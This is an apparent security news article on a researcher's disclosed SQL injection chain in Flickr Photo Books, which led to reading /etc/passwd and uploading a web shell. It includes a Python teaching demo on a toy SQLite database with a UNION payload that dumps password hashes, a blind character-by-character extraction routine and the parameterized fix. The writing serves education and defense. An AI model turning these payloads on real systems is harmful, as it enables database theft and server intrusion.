The recent discovery was made by Ibrahim Raafat, a security researcher from Egypt. He identified critical SQL injection vulnerabilities associated with the new Flickr Photo Books feature, which was introduced just five months ago for creating custom photo books.
His findings highlighted two parameters, page_id and items, that were susceptible to blind SQL injection, where query results are never shown in the response and must be inferred from true/false or timing differences. A third parameter, order_id, was vulnerable to direct SQL injection: its query results were reflected back in the response, which let him run arbitrary SQL SELECT statements against the Flickr database and read the output.
Exploiting these SQL vulnerabilities could have enabled an attacker to extract sensitive information, including database contents and the MySQL administrator credentials. A breach of that kind would have severely undermined user trust and data privacy.
Raafat's investigation further showed that the injection could be pushed beyond data theft. Calling MySQL's load_file("/etc/passwd") through the injection point let him read files from the Flickr server's filesystem. load_file() only works when the application's database account holds the FILE privilege and the server's secure_file_priv setting permits the path, so its success also indicated an over-privileged database account. He then leveraged the same access to create and upload a custom shell to the server, which gave him remote code execution.
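The two injection styles described above, as an added example that is not part of the original report and not Raafat's or Flickr's code: a constructed SQLite schema (table and column names are hypothetical) with an order lookup that splices the order_id parameter into the query text, a UNION payload that pulls rows from another table straight into the response (direct injection), a boolean oracle that reconstructs a value one character at a time when only row-present/row-absent is observable (blind injection), and the parameterized lookup that neutralizes both. SQLite stands in for MySQL so the example runs offline, so there is no load_file() equivalent here.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a photo-book order store.

    Table/column names and the password hash are hypothetical sample data.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE orders (order_id INTEGER, owner TEXT, title TEXT);
        CREATE TABLE users  (username TEXT, password_hash TEXT);
        INSERT INTO orders VALUES (101, 'alice', 'Summer 2013');
        INSERT INTO orders VALUES (102, 'bob',   'Wedding');
        INSERT INTO users  VALUES ('admin', 'deadbeef0123456789abcdef01234567');
    """)
    return conn


def get_order_vulnerable(conn, order_id: str) -> list:
    """Vulnerable pattern: the request parameter becomes part of the SQL text."""
    sql = f"SELECT title FROM orders WHERE order_id = {order_id}"
    return [row[0] for row in conn.execute(sql)]


def get_order_safe(conn, order_id: str) -> list:
    """Hardened pattern: the value is bound as a parameter, never parsed as SQL."""
    rows = conn.execute("SELECT title FROM orders WHERE order_id = ?", (order_id,))
    return [row[0] for row in rows]


def direct_injection(conn) -> list:
    """Direct SQLi: results are echoed, so a UNION appends rows from any table."""
    payload = "101 UNION SELECT username || ':' || password_hash FROM users"
    return get_order_vulnerable(conn, payload)


def make_oracle(conn):
    """Models a blind channel: the page shows order 101 only if the injected
    condition is true, leaking exactly one bit per request."""
    return lambda cond: bool(get_order_vulnerable(conn, f"101 AND ({cond})"))


def blind_extract(oracle, column: str, table: str, length: int) -> str:
    """Blind SQLi: recover a value with a binary search per character,
    asking only yes/no questions of the oracle (about 7 requests per byte)."""
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII search space
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (f"unicode(substr((SELECT {column} FROM {table} LIMIT 1), "
                    f"{pos}, 1)) > {mid}")
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


def demo():
    conn = build_db()
    leaked = direct_injection(conn)
    blind = blind_extract(make_oracle(conn), "password_hash", "users", 32)
    # The bound parameter is compared as a value, so the payload matches nothing.
    blocked = get_order_safe(conn, "101 UNION SELECT username FROM users")
    return leaked, blind, blocked


if __name__ == "__main__":
    print(demo())
```

The blind path is the expensive one (roughly seven requests per recovered byte), which is why a direct channel such as the order_id one is the more damaging find; in MySQL that same direct channel is what makes load_file() output readable, provided the database account holds the FILE privilege.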
Following his responsible disclosure of the vulnerabilities to Yahoo, prompt action was taken to patch the identified issues. In recognition of Raafat’s work, Yahoo awarded him a substantial bug bounty payout of $15,000, noting this as one of the largest rewards issued for reporting such vulnerabilities.
This incident highlights the importance of robust security measures and continuous vulnerability assessment for online platforms. The chain is a textbook one rather than a sophisticated exploit: in MITRE ATT&CK terms it maps to Initial Access via Exploit Public-Facing Application (T1190) for the SQL injection itself and Persistence via Server Software Component: Web Shell (T1505.003) for the uploaded shell. The report describes no privilege escalation on the host, but a database account able to call load_file() and write files is itself an excess of privilege that turns a query injection into file read and write. The concrete defenses are parameterized queries for every user-controlled value, a database account without the FILE privilege and with only the rights the application needs, and a restrictive secure_file_priv setting on the MySQL server.
As this case illustrates the evolving landscape of cybersecurity threats, it serves as a crucial reminder for organizations to remain vigilant and adopt comprehensive security strategies. By staying informed of recent vulnerabilities and implementing best practices, companies can better protect themselves against potential exploitation and data breaches.